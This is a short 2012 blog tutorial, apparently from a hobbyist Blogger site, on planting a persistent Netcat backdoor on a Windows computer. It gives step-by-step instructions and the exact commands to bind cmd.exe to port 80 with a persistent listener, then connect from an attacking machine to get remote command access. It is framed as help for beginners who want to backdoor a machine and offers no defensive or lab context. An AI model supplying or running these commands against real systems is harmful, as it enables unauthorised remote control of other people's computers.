Home » , » Backdoor via Netcat

Backdoor via Netcat

Written By Unknown on Tuesday, 23 October 2012 | 14:06


Most of you are probably asking what is NetCat? To make it simple, 

NetCat/NC makes and accepts Transmission Control Protocol (TCP) 

and User Datagram Protocol (UDP) connections. Literally that's it lol

This is for the newbees who dont know what NC is and want to 

know how to backdoor using this software.


How to make a persistent backdoor with NetCat

This is the overview of what we are going to be doing. The fist thing 

we want to do is put nc.exe, which is the executable file, in 

system32. Then After that we are going to head to CMD and make a 

persistent listener. 

1. Downlaod NC
http://www.downloadnetcat.com/

2. Place NC.exe in system32

3. Go to CMD and type this Command Line.



Code:
nc -v -L -p 80 -e cmd.exe


Let me explain the code, -v is verbose, -L is to make it Listen which 

is different from -l because if you would have put -l parameters 

instead of -L parameters, once you close the CMD window, the NC 

session will be closed as well. -p is the port you want to listen to. -e 

is the executable program you want to launch once the connection is 

established, in our case, command prompt.

Now you can close the window and still have NC listening on port 

80. Now that you have backdoored the remote machine with it, its 

time to connect to it.

On the attacking machine, go to CMD and type this command line:



Code:
nc -v [IpOfTargetMachine] 80


Once you hit enter, you will have CMD access to the remote computer!

  

credit to connhen4mat
Share this article :

Post a Comment

 
Support : Creating Website | Johny Template | Mas Template
Copyright © 2011. Turorial Grapich Design and Blog Design - All Rights Reserved
Template Created by Creating Website Published by Mas Template
Proudly powered by Blogger